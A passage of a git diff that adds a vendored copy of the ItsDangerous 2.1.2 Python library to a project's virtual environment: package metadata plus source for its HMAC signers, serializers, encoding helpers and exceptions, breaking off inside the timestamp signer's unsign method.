_please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://itsdangerous.palletsprojects.com/ +- Changes: https://itsdangerous.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/ItsDangerous/ +- Source Code: https://github.com/pallets/itsdangerous/ +- Issue Tracker: https://github.com/pallets/itsdangerous/issues/ +- Website: https://palletsprojects.com/p/itsdangerous/ +- Twitter: https://twitter.com/PalletsTeam +- Chat: https://discord.gg/pallets + + diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD new file mode 100644 index 00000000..d3a279a7 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD @@ -0,0 +1,23 @@ +itsdangerous-2.1.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +itsdangerous-2.1.2.dist-info/LICENSE.rst,sha256=Y68JiRtr6K0aQlLtQ68PTvun_JSOIoNnvtfzxa4LCdc,1475 +itsdangerous-2.1.2.dist-info/METADATA,sha256=ThrHIJQ_6XlfbDMCAVe_hawT7IXiIxnTBIDrwxxtucQ,2928 +itsdangerous-2.1.2.dist-info/RECORD,, +itsdangerous-2.1.2.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +itsdangerous-2.1.2.dist-info/top_level.txt,sha256=gKN1OKLk81i7fbWWildJA88EQ9NhnGMSvZqhfz9ICjk,13 +itsdangerous/__init__.py,sha256=n4mkyjlIVn23pgsgCIw0MJKPdcHIetyeRpe5Fwsn8qg,876 +itsdangerous/__pycache__/__init__.cpython-310.pyc,, +itsdangerous/__pycache__/_json.cpython-310.pyc,, +itsdangerous/__pycache__/encoding.cpython-310.pyc,, +itsdangerous/__pycache__/exc.cpython-310.pyc,, +itsdangerous/__pycache__/serializer.cpython-310.pyc,, +itsdangerous/__pycache__/signer.cpython-310.pyc,, +itsdangerous/__pycache__/timed.cpython-310.pyc,, +itsdangerous/__pycache__/url_safe.cpython-310.pyc,, +itsdangerous/_json.py,sha256=wIhs_7-_XZolmyr-JvKNiy_LgAcfevYR0qhCVdlIhg8,450 +itsdangerous/encoding.py,sha256=pgh86snHC76dPLNCnPlrjR5SaYL_M8H-gWRiiLNbhCU,1419 +itsdangerous/exc.py,sha256=VFxmP2lMoSJFqxNMzWonqs35ROII4-fvCBfG0v1Tkbs,3206 +itsdangerous/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +itsdangerous/serializer.py,sha256=zgZ1-U705jHDpt62x_pmLJdryEKDNAbt5UkJtnkcCSw,11144 +itsdangerous/signer.py,sha256=QUH0iX0in-OTptMAXKU5zWMwmOCXn1fsDsubXiGdFN4,9367 +itsdangerous/timed.py,sha256=5CBWLds4Nm8-3bFVC8RxNzFjx6PSwjch8wuZ5cwcHFI,8174 +itsdangerous/url_safe.py,sha256=5bC4jSKOjWNRkWrFseifWVXUnHnPgwOLROjiOwb-eeo,2402 diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt new file mode 100644 index 00000000..e163955e --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt @@ -0,0 +1 @@ +itsdangerous diff --git a/env/Lib/site-packages/itsdangerous/__init__.py b/env/Lib/site-packages/itsdangerous/__init__.py new file mode 100644 index 00000000..fdb2dfd0 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/__init__.py @@ -0,0 +1,19 @@ +from .encoding import base64_decode as base64_decode +from .encoding import base64_encode as base64_encode +from .encoding import want_bytes as want_bytes +from .exc import BadData as BadData +from .exc 
import BadHeader as BadHeader +from .exc import BadPayload as BadPayload +from .exc import BadSignature as BadSignature +from .exc import BadTimeSignature as BadTimeSignature +from .exc import SignatureExpired as SignatureExpired +from .serializer import Serializer as Serializer +from .signer import HMACAlgorithm as HMACAlgorithm +from .signer import NoneAlgorithm as NoneAlgorithm +from .signer import Signer as Signer +from .timed import TimedSerializer as TimedSerializer +from .timed import TimestampSigner as TimestampSigner +from .url_safe import URLSafeSerializer as URLSafeSerializer +from .url_safe import URLSafeTimedSerializer as URLSafeTimedSerializer + +__version__ = "2.1.2" diff --git a/env/Lib/site-packages/itsdangerous/_json.py b/env/Lib/site-packages/itsdangerous/_json.py new file mode 100644 index 00000000..c70d37a9 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/_json.py @@ -0,0 +1,16 @@ +import json as _json +import typing as _t + + +class _CompactJSON: + """Wrapper around json module that strips whitespace.""" + + @staticmethod + def loads(payload: _t.Union[str, bytes]) -> _t.Any: + return _json.loads(payload) + + @staticmethod + def dumps(obj: _t.Any, **kwargs: _t.Any) -> str: + kwargs.setdefault("ensure_ascii", False) + kwargs.setdefault("separators", (",", ":")) + return _json.dumps(obj, **kwargs) diff --git a/env/Lib/site-packages/itsdangerous/encoding.py b/env/Lib/site-packages/itsdangerous/encoding.py new file mode 100644 index 00000000..edb04d1a --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/encoding.py @@ -0,0 +1,54 @@ +import base64 +import string +import struct +import typing as _t + +from .exc import BadData + +_t_str_bytes = _t.Union[str, bytes] + + +def want_bytes( + s: _t_str_bytes, encoding: str = "utf-8", errors: str = "strict" +) -> bytes: + if isinstance(s, str): + s = s.encode(encoding, errors) + + return s + + +def base64_encode(string: _t_str_bytes) -> bytes: + """Base64 encode a string of bytes or text. The resulting bytes are + safe to use in URLs. + """ + string = want_bytes(string) + return base64.urlsafe_b64encode(string).rstrip(b"=") + + +def base64_decode(string: _t_str_bytes) -> bytes: + """Base64 decode a URL-safe string of bytes or text. The result is + bytes. + """ + string = want_bytes(string, encoding="ascii", errors="ignore") + string += b"=" * (-len(string) % 4) + + try: + return base64.urlsafe_b64decode(string) + except (TypeError, ValueError) as e: + raise BadData("Invalid base64-encoded data") from e + + +# The alphabet used by base64.urlsafe_* +_base64_alphabet = f"{string.ascii_letters}{string.digits}-_=".encode("ascii") + +_int64_struct = struct.Struct(">Q") +_int_to_bytes = _int64_struct.pack +_bytes_to_int = _t.cast("_t.Callable[[bytes], _t.Tuple[int]]", _int64_struct.unpack) + + +def int_to_bytes(num: int) -> bytes: + return _int_to_bytes(num).lstrip(b"\x00") + + +def bytes_to_int(bytestr: bytes) -> int: + return _bytes_to_int(bytestr.rjust(8, b"\x00"))[0] diff --git a/env/Lib/site-packages/itsdangerous/exc.py b/env/Lib/site-packages/itsdangerous/exc.py new file mode 100644 index 00000000..c38a6af5 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/exc.py @@ -0,0 +1,107 @@ +import typing as _t +from datetime import datetime + +_t_opt_any = _t.Optional[_t.Any] +_t_opt_exc = _t.Optional[Exception] + + +class BadData(Exception): + """Raised if bad data of any sort was encountered. This is the base + for all exceptions that ItsDangerous defines. + + .. 
versionadded:: 0.15 + """ + + def __init__(self, message: str): + super().__init__(message) + self.message = message + + def __str__(self) -> str: + return self.message + + +class BadSignature(BadData): + """Raised if a signature does not match.""" + + def __init__(self, message: str, payload: _t_opt_any = None): + super().__init__(message) + + #: The payload that failed the signature test. In some + #: situations you might still want to inspect this, even if + #: you know it was tampered with. + #: + #: .. versionadded:: 0.14 + self.payload: _t_opt_any = payload + + +class BadTimeSignature(BadSignature): + """Raised if a time-based signature is invalid. This is a subclass + of :class:`BadSignature`. + """ + + def __init__( + self, + message: str, + payload: _t_opt_any = None, + date_signed: _t.Optional[datetime] = None, + ): + super().__init__(message, payload) + + #: If the signature expired this exposes the date of when the + #: signature was created. This can be helpful in order to + #: tell the user how long a link has been gone stale. + #: + #: .. versionchanged:: 2.0 + #: The datetime value is timezone-aware rather than naive. + #: + #: .. versionadded:: 0.14 + self.date_signed = date_signed + + +class SignatureExpired(BadTimeSignature): + """Raised if a signature timestamp is older than ``max_age``. This + is a subclass of :exc:`BadTimeSignature`. + """ + + +class BadHeader(BadSignature): + """Raised if a signed header is invalid in some form. This only + happens for serializers that have a header that goes with the + signature. + + .. versionadded:: 0.24 + """ + + def __init__( + self, + message: str, + payload: _t_opt_any = None, + header: _t_opt_any = None, + original_error: _t_opt_exc = None, + ): + super().__init__(message, payload) + + #: If the header is actually available but just malformed it + #: might be stored here. + self.header: _t_opt_any = header + + #: If available, the error that indicates why the payload was + #: not valid. This might be ``None``. + self.original_error: _t_opt_exc = original_error + + +class BadPayload(BadData): + """Raised if a payload is invalid. This could happen if the payload + is loaded despite an invalid signature, or if there is a mismatch + between the serializer and deserializer. The original exception + that occurred during loading is stored on as :attr:`original_error`. + + .. versionadded:: 0.15 + """ + + def __init__(self, message: str, original_error: _t_opt_exc = None): + super().__init__(message) + + #: If available, the error that indicates why the payload was + #: not valid. This might be ``None``. 
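
A sketch of how the exception hierarchy above is typically handled when loading a timed token (secret key and salt are placeholders):

.. code-block:: python

    from itsdangerous import BadSignature, SignatureExpired, URLSafeTimedSerializer

    s = URLSafeTimedSerializer("not-a-real-secret-key", salt="activate-account")
    token = s.dumps({"user_id": 5})

    try:
        data = s.loads(token, max_age=3600)
    except SignatureExpired as e:
        # Valid signature, but older than max_age; e.date_signed says when.
        data = None
    except BadSignature:
        # Tampered with, or signed with a different key or salt.
        data = None
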
+ self.original_error: _t_opt_exc = original_error diff --git a/env/Lib/site-packages/itsdangerous/py.typed b/env/Lib/site-packages/itsdangerous/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/itsdangerous/serializer.py b/env/Lib/site-packages/itsdangerous/serializer.py new file mode 100644 index 00000000..9f4a84a1 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/serializer.py @@ -0,0 +1,295 @@ +import json +import typing as _t + +from .encoding import want_bytes +from .exc import BadPayload +from .exc import BadSignature +from .signer import _make_keys_list +from .signer import Signer + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_kwargs = _t.Dict[str, _t.Any] +_t_opt_kwargs = _t.Optional[_t_kwargs] +_t_signer = _t.Type[Signer] +_t_fallbacks = _t.List[_t.Union[_t_kwargs, _t.Tuple[_t_signer, _t_kwargs], _t_signer]] +_t_load_unsafe = _t.Tuple[bool, _t.Any] +_t_secret_key = _t.Union[_t.Iterable[_t_str_bytes], _t_str_bytes] + + +def is_text_serializer(serializer: _t.Any) -> bool: + """Checks whether a serializer generates text or binary.""" + return isinstance(serializer.dumps({}), str) + + +class Serializer: + """A serializer wraps a :class:`~itsdangerous.signer.Signer` to + enable serializing and securely signing data other than bytes. It + can unsign to verify that the data hasn't been changed. + + The serializer provides :meth:`dumps` and :meth:`loads`, similar to + :mod:`json`, and by default uses :mod:`json` internally to serialize + the data to bytes. + + The secret key should be a random string of ``bytes`` and should not + be saved to code or version control. Different salts should be used + to distinguish signing in different contexts. See :doc:`/concepts` + for information about the security of the secret key and salt. + + :param secret_key: The secret key to sign and verify with. Can be a + list of keys, oldest to newest, to support key rotation. + :param salt: Extra key to combine with ``secret_key`` to distinguish + signatures in different contexts. + :param serializer: An object that provides ``dumps`` and ``loads`` + methods for serializing data to a string. Defaults to + :attr:`default_serializer`, which defaults to :mod:`json`. + :param serializer_kwargs: Keyword arguments to pass when calling + ``serializer.dumps``. + :param signer: A ``Signer`` class to instantiate when signing data. + Defaults to :attr:`default_signer`, which defaults to + :class:`~itsdangerous.signer.Signer`. + :param signer_kwargs: Keyword arguments to pass when instantiating + the ``Signer`` class. + :param fallback_signers: List of signer parameters to try when + unsigning with the default signer fails. Each item can be a dict + of ``signer_kwargs``, a ``Signer`` class, or a tuple of + ``(signer, signer_kwargs)``. Defaults to + :attr:`default_fallback_signers`. + + .. versionchanged:: 2.0 + Added support for key rotation by passing a list to + ``secret_key``. + + .. versionchanged:: 2.0 + Removed the default SHA-512 fallback signer from + ``default_fallback_signers``. + + .. versionchanged:: 1.1 + Added support for ``fallback_signers`` and configured a default + SHA-512 fallback. This fallback is for users who used the yanked + 1.0.0 release which defaulted to SHA-512. + + .. versionchanged:: 0.14 + The ``signer`` and ``signer_kwargs`` parameters were added to + the constructor. + """ + + #: The default serialization module to use to serialize data to a + #: string internally. 
The default is :mod:`json`, but can be changed + #: to any object that provides ``dumps`` and ``loads`` methods. + default_serializer: _t.Any = json + + #: The default ``Signer`` class to instantiate when signing data. + #: The default is :class:`itsdangerous.signer.Signer`. + default_signer: _t_signer = Signer + + #: The default fallback signers to try when unsigning fails. + default_fallback_signers: _t_fallbacks = [] + + def __init__( + self, + secret_key: _t_secret_key, + salt: _t_opt_str_bytes = b"itsdangerous", + serializer: _t.Any = None, + serializer_kwargs: _t_opt_kwargs = None, + signer: _t.Optional[_t_signer] = None, + signer_kwargs: _t_opt_kwargs = None, + fallback_signers: _t.Optional[_t_fallbacks] = None, + ): + #: The list of secret keys to try for verifying signatures, from + #: oldest to newest. The newest (last) key is used for signing. + #: + #: This allows a key rotation system to keep a list of allowed + #: keys and remove expired ones. + self.secret_keys: _t.List[bytes] = _make_keys_list(secret_key) + + if salt is not None: + salt = want_bytes(salt) + # if salt is None then the signer's default is used + + self.salt = salt + + if serializer is None: + serializer = self.default_serializer + + self.serializer: _t.Any = serializer + self.is_text_serializer: bool = is_text_serializer(serializer) + + if signer is None: + signer = self.default_signer + + self.signer: _t_signer = signer + self.signer_kwargs: _t_kwargs = signer_kwargs or {} + + if fallback_signers is None: + fallback_signers = list(self.default_fallback_signers or ()) + + self.fallback_signers: _t_fallbacks = fallback_signers + self.serializer_kwargs: _t_kwargs = serializer_kwargs or {} + + @property + def secret_key(self) -> bytes: + """The newest (last) entry in the :attr:`secret_keys` list. This + is for compatibility from before key rotation support was added. + """ + return self.secret_keys[-1] + + def load_payload( + self, payload: bytes, serializer: _t.Optional[_t.Any] = None + ) -> _t.Any: + """Loads the encoded object. This function raises + :class:`.BadPayload` if the payload is not valid. The + ``serializer`` parameter can be used to override the serializer + stored on the class. The encoded ``payload`` should always be + bytes. + """ + if serializer is None: + serializer = self.serializer + is_text = self.is_text_serializer + else: + is_text = is_text_serializer(serializer) + + try: + if is_text: + return serializer.loads(payload.decode("utf-8")) + + return serializer.loads(payload) + except Exception as e: + raise BadPayload( + "Could not load the payload because an exception" + " occurred on unserializing the data.", + original_error=e, + ) from e + + def dump_payload(self, obj: _t.Any) -> bytes: + """Dumps the encoded object. The return value is always bytes. + If the internal serializer returns text, the value will be + encoded as UTF-8. + """ + return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs)) + + def make_signer(self, salt: _t_opt_str_bytes = None) -> Signer: + """Creates a new instance of the signer to be used. The default + implementation uses the :class:`.Signer` base class. + """ + if salt is None: + salt = self.salt + + return self.signer(self.secret_keys, salt=salt, **self.signer_kwargs) + + def iter_unsigners(self, salt: _t_opt_str_bytes = None) -> _t.Iterator[Signer]: + """Iterates over all signers to be tried for unsigning. Starts + with the configured signer, then constructs each signer + specified in ``fallback_signers``. 
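
A sketch of the key-rotation behaviour described above, with placeholder keys:

.. code-block:: python

    from itsdangerous import Serializer

    # Keys are listed oldest to newest; the last one signs, all of them verify.
    old_token = Serializer("old-secret").dumps({"id": 1})

    s = Serializer(["old-secret", "new-secret"])
    assert s.loads(old_token) == {"id": 1}   # still accepted during rotation
    assert s.dumps({"id": 1}) != old_token   # new tokens are signed with "new-secret"
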
+ """ + if salt is None: + salt = self.salt + + yield self.make_signer(salt) + + for fallback in self.fallback_signers: + if isinstance(fallback, dict): + kwargs = fallback + fallback = self.signer + elif isinstance(fallback, tuple): + fallback, kwargs = fallback + else: + kwargs = self.signer_kwargs + + for secret_key in self.secret_keys: + yield fallback(secret_key, salt=salt, **kwargs) + + def dumps(self, obj: _t.Any, salt: _t_opt_str_bytes = None) -> _t_str_bytes: + """Returns a signed string serialized with the internal + serializer. The return value can be either a byte or unicode + string depending on the format of the internal serializer. + """ + payload = want_bytes(self.dump_payload(obj)) + rv = self.make_signer(salt).sign(payload) + + if self.is_text_serializer: + return rv.decode("utf-8") + + return rv + + def dump(self, obj: _t.Any, f: _t.IO, salt: _t_opt_str_bytes = None) -> None: + """Like :meth:`dumps` but dumps into a file. The file handle has + to be compatible with what the internal serializer expects. + """ + f.write(self.dumps(obj, salt)) + + def loads( + self, s: _t_str_bytes, salt: _t_opt_str_bytes = None, **kwargs: _t.Any + ) -> _t.Any: + """Reverse of :meth:`dumps`. Raises :exc:`.BadSignature` if the + signature validation fails. + """ + s = want_bytes(s) + last_exception = None + + for signer in self.iter_unsigners(salt): + try: + return self.load_payload(signer.unsign(s)) + except BadSignature as err: + last_exception = err + + raise _t.cast(BadSignature, last_exception) + + def load(self, f: _t.IO, salt: _t_opt_str_bytes = None) -> _t.Any: + """Like :meth:`loads` but loads from a file.""" + return self.loads(f.read(), salt) + + def loads_unsafe( + self, s: _t_str_bytes, salt: _t_opt_str_bytes = None + ) -> _t_load_unsafe: + """Like :meth:`loads` but without verifying the signature. This + is potentially very dangerous to use depending on how your + serializer works. The return value is ``(signature_valid, + payload)`` instead of just the payload. The first item will be a + boolean that indicates if the signature is valid. This function + never fails. + + Use it for debugging only and if you know that your serializer + module is not exploitable (for example, do not use it with a + pickle serializer). + + .. versionadded:: 0.15 + """ + return self._loads_unsafe_impl(s, salt) + + def _loads_unsafe_impl( + self, + s: _t_str_bytes, + salt: _t_opt_str_bytes, + load_kwargs: _t_opt_kwargs = None, + load_payload_kwargs: _t_opt_kwargs = None, + ) -> _t_load_unsafe: + """Low level helper function to implement :meth:`loads_unsafe` + in serializer subclasses. + """ + if load_kwargs is None: + load_kwargs = {} + + try: + return True, self.loads(s, salt=salt, **load_kwargs) + except BadSignature as e: + if e.payload is None: + return False, None + + if load_payload_kwargs is None: + load_payload_kwargs = {} + + try: + return ( + False, + self.load_payload(e.payload, **load_payload_kwargs), + ) + except BadPayload: + return False, None + + def load_unsafe(self, f: _t.IO, salt: _t_opt_str_bytes = None) -> _t_load_unsafe: + """Like :meth:`loads_unsafe` but loads from a file. + + .. 
versionadded:: 0.15 + """ + return self.loads_unsafe(f.read(), salt=salt) diff --git a/env/Lib/site-packages/itsdangerous/signer.py b/env/Lib/site-packages/itsdangerous/signer.py new file mode 100644 index 00000000..aa12005e --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/signer.py @@ -0,0 +1,257 @@ +import hashlib +import hmac +import typing as _t + +from .encoding import _base64_alphabet +from .encoding import base64_decode +from .encoding import base64_encode +from .encoding import want_bytes +from .exc import BadSignature + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_secret_key = _t.Union[_t.Iterable[_t_str_bytes], _t_str_bytes] + + +class SigningAlgorithm: + """Subclasses must implement :meth:`get_signature` to provide + signature generation functionality. + """ + + def get_signature(self, key: bytes, value: bytes) -> bytes: + """Returns the signature for the given key and value.""" + raise NotImplementedError() + + def verify_signature(self, key: bytes, value: bytes, sig: bytes) -> bool: + """Verifies the given signature matches the expected + signature. + """ + return hmac.compare_digest(sig, self.get_signature(key, value)) + + +class NoneAlgorithm(SigningAlgorithm): + """Provides an algorithm that does not perform any signing and + returns an empty signature. + """ + + def get_signature(self, key: bytes, value: bytes) -> bytes: + return b"" + + +class HMACAlgorithm(SigningAlgorithm): + """Provides signature generation using HMACs.""" + + #: The digest method to use with the MAC algorithm. This defaults to + #: SHA1, but can be changed to any other function in the hashlib + #: module. + default_digest_method: _t.Any = staticmethod(hashlib.sha1) + + def __init__(self, digest_method: _t.Any = None): + if digest_method is None: + digest_method = self.default_digest_method + + self.digest_method: _t.Any = digest_method + + def get_signature(self, key: bytes, value: bytes) -> bytes: + mac = hmac.new(key, msg=value, digestmod=self.digest_method) + return mac.digest() + + +def _make_keys_list(secret_key: _t_secret_key) -> _t.List[bytes]: + if isinstance(secret_key, (str, bytes)): + return [want_bytes(secret_key)] + + return [want_bytes(s) for s in secret_key] + + +class Signer: + """A signer securely signs bytes, then unsigns them to verify that + the value hasn't been changed. + + The secret key should be a random string of ``bytes`` and should not + be saved to code or version control. Different salts should be used + to distinguish signing in different contexts. See :doc:`/concepts` + for information about the security of the secret key and salt. + + :param secret_key: The secret key to sign and verify with. Can be a + list of keys, oldest to newest, to support key rotation. + :param salt: Extra key to combine with ``secret_key`` to distinguish + signatures in different contexts. + :param sep: Separator between the signature and value. + :param key_derivation: How to derive the signing key from the secret + key and salt. Possible values are ``concat``, ``django-concat``, + or ``hmac``. Defaults to :attr:`default_key_derivation`, which + defaults to ``django-concat``. + :param digest_method: Hash function to use when generating the HMAC + signature. Defaults to :attr:`default_digest_method`, which + defaults to :func:`hashlib.sha1`. Note that the security of the + hash alone doesn't apply when used intermediately in HMAC. 
+ :param algorithm: A :class:`SigningAlgorithm` instance to use + instead of building a default :class:`HMACAlgorithm` with the + ``digest_method``. + + .. versionchanged:: 2.0 + Added support for key rotation by passing a list to + ``secret_key``. + + .. versionchanged:: 0.18 + ``algorithm`` was added as an argument to the class constructor. + + .. versionchanged:: 0.14 + ``key_derivation`` and ``digest_method`` were added as arguments + to the class constructor. + """ + + #: The default digest method to use for the signer. The default is + #: :func:`hashlib.sha1`, but can be changed to any :mod:`hashlib` or + #: compatible object. Note that the security of the hash alone + #: doesn't apply when used intermediately in HMAC. + #: + #: .. versionadded:: 0.14 + default_digest_method: _t.Any = staticmethod(hashlib.sha1) + + #: The default scheme to use to derive the signing key from the + #: secret key and salt. The default is ``django-concat``. Possible + #: values are ``concat``, ``django-concat``, and ``hmac``. + #: + #: .. versionadded:: 0.14 + default_key_derivation: str = "django-concat" + + def __init__( + self, + secret_key: _t_secret_key, + salt: _t_opt_str_bytes = b"itsdangerous.Signer", + sep: _t_str_bytes = b".", + key_derivation: _t.Optional[str] = None, + digest_method: _t.Optional[_t.Any] = None, + algorithm: _t.Optional[SigningAlgorithm] = None, + ): + #: The list of secret keys to try for verifying signatures, from + #: oldest to newest. The newest (last) key is used for signing. + #: + #: This allows a key rotation system to keep a list of allowed + #: keys and remove expired ones. + self.secret_keys: _t.List[bytes] = _make_keys_list(secret_key) + self.sep: bytes = want_bytes(sep) + + if self.sep in _base64_alphabet: + raise ValueError( + "The given separator cannot be used because it may be" + " contained in the signature itself. ASCII letters," + " digits, and '-_=' must not be used." + ) + + if salt is not None: + salt = want_bytes(salt) + else: + salt = b"itsdangerous.Signer" + + self.salt = salt + + if key_derivation is None: + key_derivation = self.default_key_derivation + + self.key_derivation: str = key_derivation + + if digest_method is None: + digest_method = self.default_digest_method + + self.digest_method: _t.Any = digest_method + + if algorithm is None: + algorithm = HMACAlgorithm(self.digest_method) + + self.algorithm: SigningAlgorithm = algorithm + + @property + def secret_key(self) -> bytes: + """The newest (last) entry in the :attr:`secret_keys` list. This + is for compatibility from before key rotation support was added. + """ + return self.secret_keys[-1] + + def derive_key(self, secret_key: _t_opt_str_bytes = None) -> bytes: + """This method is called to derive the key. The default key + derivation choices can be overridden here. Key derivation is not + intended to be used as a security method to make a complex key + out of a short password. Instead you should use large random + secret keys. + + :param secret_key: A specific secret key to derive from. + Defaults to the last item in :attr:`secret_keys`. + + .. versionchanged:: 2.0 + Added the ``secret_key`` parameter. 
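Editor's note, not part of the vendored file: a minimal sketch of how the Signer API shown above is typically used, assuming placeholder secrets and salt. The key list is ordered oldest to newest, so the last entry signs new values while older entries still verify::

    from itsdangerous import Signer

    signer = Signer(["old-secret", "current-secret"], salt="email-confirm")
    token = signer.sign("user-42")            # value + sep + base64 signature, as bytes
    assert signer.unsign(token) == b"user-42"
    assert signer.validate(token)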
+ """ + if secret_key is None: + secret_key = self.secret_keys[-1] + else: + secret_key = want_bytes(secret_key) + + if self.key_derivation == "concat": + return _t.cast(bytes, self.digest_method(self.salt + secret_key).digest()) + elif self.key_derivation == "django-concat": + return _t.cast( + bytes, self.digest_method(self.salt + b"signer" + secret_key).digest() + ) + elif self.key_derivation == "hmac": + mac = hmac.new(secret_key, digestmod=self.digest_method) + mac.update(self.salt) + return mac.digest() + elif self.key_derivation == "none": + return secret_key + else: + raise TypeError("Unknown key derivation method") + + def get_signature(self, value: _t_str_bytes) -> bytes: + """Returns the signature for the given value.""" + value = want_bytes(value) + key = self.derive_key() + sig = self.algorithm.get_signature(key, value) + return base64_encode(sig) + + def sign(self, value: _t_str_bytes) -> bytes: + """Signs the given string.""" + value = want_bytes(value) + return value + self.sep + self.get_signature(value) + + def verify_signature(self, value: _t_str_bytes, sig: _t_str_bytes) -> bool: + """Verifies the signature for the given value.""" + try: + sig = base64_decode(sig) + except Exception: + return False + + value = want_bytes(value) + + for secret_key in reversed(self.secret_keys): + key = self.derive_key(secret_key) + + if self.algorithm.verify_signature(key, value, sig): + return True + + return False + + def unsign(self, signed_value: _t_str_bytes) -> bytes: + """Unsigns the given string.""" + signed_value = want_bytes(signed_value) + + if self.sep not in signed_value: + raise BadSignature(f"No {self.sep!r} found in value") + + value, sig = signed_value.rsplit(self.sep, 1) + + if self.verify_signature(value, sig): + return value + + raise BadSignature(f"Signature {sig!r} does not match", payload=value) + + def validate(self, signed_value: _t_str_bytes) -> bool: + """Only validates the given signed value. Returns ``True`` if + the signature exists and is valid. + """ + try: + self.unsign(signed_value) + return True + except BadSignature: + return False diff --git a/env/Lib/site-packages/itsdangerous/timed.py b/env/Lib/site-packages/itsdangerous/timed.py new file mode 100644 index 00000000..cad8da34 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/timed.py @@ -0,0 +1,234 @@ +import time +import typing +import typing as _t +from datetime import datetime +from datetime import timezone + +from .encoding import base64_decode +from .encoding import base64_encode +from .encoding import bytes_to_int +from .encoding import int_to_bytes +from .encoding import want_bytes +from .exc import BadSignature +from .exc import BadTimeSignature +from .exc import SignatureExpired +from .serializer import Serializer +from .signer import Signer + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_opt_int = _t.Optional[int] + +if _t.TYPE_CHECKING: + import typing_extensions as _te + + +class TimestampSigner(Signer): + """Works like the regular :class:`.Signer` but also records the time + of the signing and can be used to expire signatures. The + :meth:`unsign` method can raise :exc:`.SignatureExpired` if the + unsigning failed because the signature is expired. + """ + + def get_timestamp(self) -> int: + """Returns the current timestamp. The function must return an + integer. 
+ """ + return int(time.time()) + + def timestamp_to_datetime(self, ts: int) -> datetime: + """Convert the timestamp from :meth:`get_timestamp` into an + aware :class`datetime.datetime` in UTC. + + .. versionchanged:: 2.0 + The timestamp is returned as a timezone-aware ``datetime`` + in UTC rather than a naive ``datetime`` assumed to be UTC. + """ + return datetime.fromtimestamp(ts, tz=timezone.utc) + + def sign(self, value: _t_str_bytes) -> bytes: + """Signs the given string and also attaches time information.""" + value = want_bytes(value) + timestamp = base64_encode(int_to_bytes(self.get_timestamp())) + sep = want_bytes(self.sep) + value = value + sep + timestamp + return value + sep + self.get_signature(value) + + # Ignore overlapping signatures check, return_timestamp is the only + # parameter that affects the return type. + + @typing.overload + def unsign( # type: ignore + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: "_te.Literal[False]" = False, + ) -> bytes: + ... + + @typing.overload + def unsign( + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: "_te.Literal[True]" = True, + ) -> _t.Tuple[bytes, datetime]: + ... + + def unsign( + self, + signed_value: _t_str_bytes, + max_age: _t_opt_int = None, + return_timestamp: bool = False, + ) -> _t.Union[_t.Tuple[bytes, datetime], bytes]: + """Works like the regular :meth:`.Signer.unsign` but can also + validate the time. See the base docstring of the class for + the general behavior. If ``return_timestamp`` is ``True`` the + timestamp of the signature will be returned as an aware + :class:`datetime.datetime` object in UTC. + + .. versionchanged:: 2.0 + The timestamp is returned as a timezone-aware ``datetime`` + in UTC rather than a naive ``datetime`` assumed to be UTC. + """ + try: + result = super().unsign(signed_value) + sig_error = None + except BadSignature as e: + sig_error = e + result = e.payload or b"" + + sep = want_bytes(self.sep) + + # If there is no timestamp in the result there is something + # seriously wrong. In case there was a signature error, we raise + # that one directly, otherwise we have a weird situation in + # which we shouldn't have come except someone uses a time-based + # serializer on non-timestamp data, so catch that. + if sep not in result: + if sig_error: + raise sig_error + + raise BadTimeSignature("timestamp missing", payload=result) + + value, ts_bytes = result.rsplit(sep, 1) + ts_int: _t_opt_int = None + ts_dt: _t.Optional[datetime] = None + + try: + ts_int = bytes_to_int(base64_decode(ts_bytes)) + except Exception: + pass + + # Signature is *not* okay. Raise a proper error now that we have + # split the value and the timestamp. + if sig_error is not None: + if ts_int is not None: + try: + ts_dt = self.timestamp_to_datetime(ts_int) + except (ValueError, OSError, OverflowError) as exc: + # Windows raises OSError + # 32-bit raises OverflowError + raise BadTimeSignature( + "Malformed timestamp", payload=value + ) from exc + + raise BadTimeSignature(str(sig_error), payload=value, date_signed=ts_dt) + + # Signature was okay but the timestamp is actually not there or + # malformed. Should not happen, but we handle it anyway. 
